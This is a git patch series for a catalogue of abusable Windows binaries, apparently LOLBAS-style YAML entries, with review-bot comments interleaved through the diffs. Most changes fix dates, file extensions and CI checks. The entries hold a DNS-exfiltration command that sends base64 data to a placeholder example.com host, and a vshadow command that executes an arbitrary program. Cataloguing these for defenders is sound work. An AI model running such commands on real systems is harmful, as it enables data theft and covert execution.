From 03711770b7a4fa63596c0bbf8a0f502ca0653891 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 16:58:52 +0100
Subject: [PATCH 01/10] Enforcing YYYY-MM-DD format for dates

---
 YML-Schema.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/YML-Schema.yml b/YML-Schema.yml
index dc3f775..250392f 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@@ -26,6 +26,7 @@ mapping:
 required: true
 "Created":
 type: date
+ format: '%Y-%M-%d'
 required: true
 "Commands":
 type: seq

From be18d9b26da86a822be211e89c3c46a9f6b21d3a Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:10:21 +0100
Subject: [PATCH 02/10] Add file extension validation

---
 .github/workflows/yaml-linting.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 120daa8..5c49ebb 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -7,6 +7,8 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v3
+ - name: Check file extensions
+ run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use ".yml" (all lower case) for files in the yml/ folder."; exit 1; fi
 - name: yaml-lint
 uses: ibiqlik/action-yamllint@v3
 with:

From 52adf7084d0816b36ae1b163ee62d9ce4e2e5147 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:12:12 +0100
Subject: [PATCH 03/10] Fixing incorrect extension of testwindowremoteagent entry

---
 .github/workflows/yaml-linting.yml | 2 +-
 .../{testwindowremoteagent.yaml => testwindowremoteagent.yml} | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename yml/OtherMSBinaries/{testwindowremoteagent.yaml => testwindowremoteagent.yml} (100%)

diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 5c49ebb..7c6026e 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
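Review bot: The added `format: '%Y-%M-%d'` uses `%M`, which in strftime-style patterns denotes minutes (00-59) rather than the month, so it does not express the YYYY-MM-DD format the commit title asks for, and a well-formed value such as 2023-08-21 may be rejected or validated against the wrong field. The month directive is lowercase: `format: '%Y-%m-%d'`. That the validator reads `format` as a strftime pattern is inferred from the value's shape; if it uses another syntax, the same month-versus-minute mix-up should be checked there. A YAML loader also turns an unquoted `2023-08-21` into a date object before the schema sees it, so confirm the validator applies `format` to the raw text and not to an already-parsed date.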
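Review bot: The new `run:` step packs the find test, a long message and the exit into one plain scalar, which makes the shell quoting fragile and never tells the contributor which files are wrong; the same one-line form is kept through the revisions in patches 03 and 04. A `run: |` block scalar that captures the find output once, tests it with `-n`, and echoes it on failure is easier to read and easier for a contributor to act on. The rewrite below keeps the message wording and the exit code.
```yaml
      - name: Check file extensions
        run: |
          unexpected="$(find ./yml -type f -not -name '*.yml')"
          if [[ -n "$unexpected" ]]; then
            echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."
            echo "$unexpected"
            exit 1
          fi
```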
@@ -8,7 +8,7 @@ jobs:
 steps:
 - uses: actions/checkout@v3
 - name: Check file extensions
- run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use ".yml" (all lower case) for files in the yml/ folder."; exit 1; fi
+ run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
 - name: yaml-lint
 uses: ibiqlik/action-yamllint@v3
 with:
diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yaml b/yml/OtherMSBinaries/testwindowremoteagent.yml
similarity index 100%
rename from yml/OtherMSBinaries/testwindowremoteagent.yaml
rename to yml/OtherMSBinaries/testwindowremoteagent.yml

From 3ec9655b61436da5f48c464a1b2388726c15985f Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:16:05 +0100
Subject: [PATCH 04/10] Updating search path

---
 .github/workflows/yaml-linting.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 7c6026e..f01a963 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -8,7 +8,7 @@ jobs:
 steps:
 - uses: actions/checkout@v3
 - name: Check file extensions
- run: if [[ $(find ./yml -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
+ run: if [[ $(find "${GITHUB.WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
 - name: yaml-lint
 uses: ibiqlik/action-yamllint@v3
 with:

From 96aad19b8813cf0a4dd348f96c0e9f3a71442e39 Mon Sep 17 00:00:00 2001
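Review bot: `"${GITHUB.WORKSPACE}/yml"` is not a valid bash parameter expansion (a `.` cannot appear in a variable name), so bash reports a bad substitution inside the command substitution; because that happens within `[[ ... ]]`, the step most likely ends with an empty result and exit 0, turning the extension check into a silent no-op rather than a failure. Use the environment variable the runner provides, `run: if [[ $(find "${GITHUB_WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then ...`, or the expression form `${{ github.workspace }}`. Since run steps start in the checked-out workspace root, the previous `./yml` was already correct and is the simpler choice.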
From: Wietze
Date: Tue, 3 Oct 2023 17:19:52 +0100
Subject: [PATCH 05/10] Fixing trailing spaces

---
 yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml
index 8e5cda3..fafdef4 100644
--- a/yml/OtherMSBinaries/testwindowremoteagent.yml
+++ b/yml/OtherMSBinaries/testwindowremoteagent.yml
@@ -2,7 +2,7 @@ Name: TestWindowRemoteAgent.exe
 Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
 Author: Onat Uzunyayla
-Created: 2023-21-08
+Created: 2023-21-08
 Commands:
 - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS

From 93aeeacb4788dbb7152833bba1cf90abbacfd504 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:21:42 +0100
Subject: [PATCH 06/10] Ensuring GitHub Actions isn't run twice on PR

---
 .github/workflows/yaml-linting.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index f01a963..f7247f4 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -4,6 +4,7 @@ on: [push,pull_request]
 jobs:
 lintFiles:
+ if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v3

From 135fc5ba49770e4d0d262ce6b7594d5e8b69a723 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:22:22 +0100
Subject: [PATCH 07/10] Fixing incorrect date on testwindowremoteagent entry

---
 yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml
index fafdef4..c6bd128 100644
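Review bot: The added job-level `if:` encodes a non-obvious rule (skip the pull_request run when the head and base repositories are the same, because the `push` trigger on the same workflow already lints that branch, but keep it for fork PRs, which raise no push event in this repository) and deserves a comment above it so the next editor does not "simplify" it away. Suggested comment: `# Same-repo PRs are already linted by the push event; only run the pull_request job for PRs from forks.` The condition itself matches the commit's stated intent; the enclosing job definition continues outside the hunk.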
--- a/yml/OtherMSBinaries/testwindowremoteagent.yml
+++ b/yml/OtherMSBinaries/testwindowremoteagent.yml
@@ -2,7 +2,7 @@ Name: TestWindowRemoteAgent.exe
 Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
 Author: Onat Uzunyayla
-Created: 2023-21-08
+Created: 2023-08-21
 Commands:
 - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS

From e90d795e6278a94e49e1fb09a48299f58375d15f Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:24:36 +0100
Subject: [PATCH 08/10] Fixing incorrect category on testwindowremoteagent entry

---
 yml/OtherMSBinaries/testwindowremoteagent.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/testwindowremoteagent.yml
index c6bd128..ef3f6d2 100644
--- a/yml/OtherMSBinaries/testwindowremoteagent.yml
+++ b/yml/OtherMSBinaries/testwindowremoteagent.yml
@@ -7,7 +7,7 @@ Commands:
 - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
 Usecase: Attackers may utilize this to exfiltrate data over DNS
- Category: Data Exfiltration
+ Category: Upload
 Privileges: User
 MitreID: T1048
 OperatingSystem: Windows 10, Windows 11

From 366cdbd57cff249584c20976eb52fbb585ce0556 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:38:30 +0100
Subject: [PATCH 09/10] Renaming vshadow file

---
 .../{testwindowremoteagent.yml => Testwindowremoteagent.yml} | 0
 yml/OtherMSBinaries/{vshadow.yaml => Vshadow.yml} | 0
 2 files changed, 0 insertions(+), 0 deletions(-)
 rename yml/OtherMSBinaries/{testwindowremoteagent.yml => Testwindowremoteagent.yml} (100%)
 rename yml/OtherMSBinaries/{vshadow.yaml => Vshadow.yml} (100%)
diff --git a/yml/OtherMSBinaries/testwindowremoteagent.yml b/yml/OtherMSBinaries/Testwindowremoteagent.yml
similarity index 100%
rename from yml/OtherMSBinaries/testwindowremoteagent.yml
rename to yml/OtherMSBinaries/Testwindowremoteagent.yml
diff --git a/yml/OtherMSBinaries/vshadow.yaml b/yml/OtherMSBinaries/Vshadow.yml
similarity index 100%
rename from yml/OtherMSBinaries/vshadow.yaml
rename to yml/OtherMSBinaries/Vshadow.yml

From b3951952b0754306c6415db8d843b172c5f1adbe Mon Sep 17 00:00:00 2001
From: Wietze
Date: Tue, 3 Oct 2023 17:41:18 +0100
Subject: [PATCH 10/10] Fixing command attribute on Vshadow

---
 yml/OtherMSBinaries/Vshadow.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml
index 25e53e7..0412f78 100644
--- a/yml/OtherMSBinaries/Vshadow.yml
+++ b/yml/OtherMSBinaries/Vshadow.yml
@@ -1,10 +1,10 @@
 ---
-Name: vshadow.exe
+Name: Vshadow.exe
 Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
 Author: Ayberk HalaƧ
 Created: 2023-09-06
 Commands:
- - Command: vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:
+ - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
 Description: Executes calc.exe from vshadow.exe.
 Usecase: Performs execution of specified executable file.
 Category: Execute
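Review bot: `Name: Vshadow.exe` now differs in case from the `vshadow.exe` used in the `Command` and `Description` lines of the same entry and from the `VShadow` spelling in the description, so a reader cannot tell which form is the canonical binary name; the other entry in this series uses `TestWindowRemoteAgent.exe` throughout, so either align the command and description with the new `Name`, or add a comment above `Name:` stating that it is capitalised to match the file name. The context line `Author: Ayberk HalaƧ` also looks mis-encoded (presumably a `ç` that went through the wrong code page); it is not part of this change but is worth correcting in the same file while it is being touched.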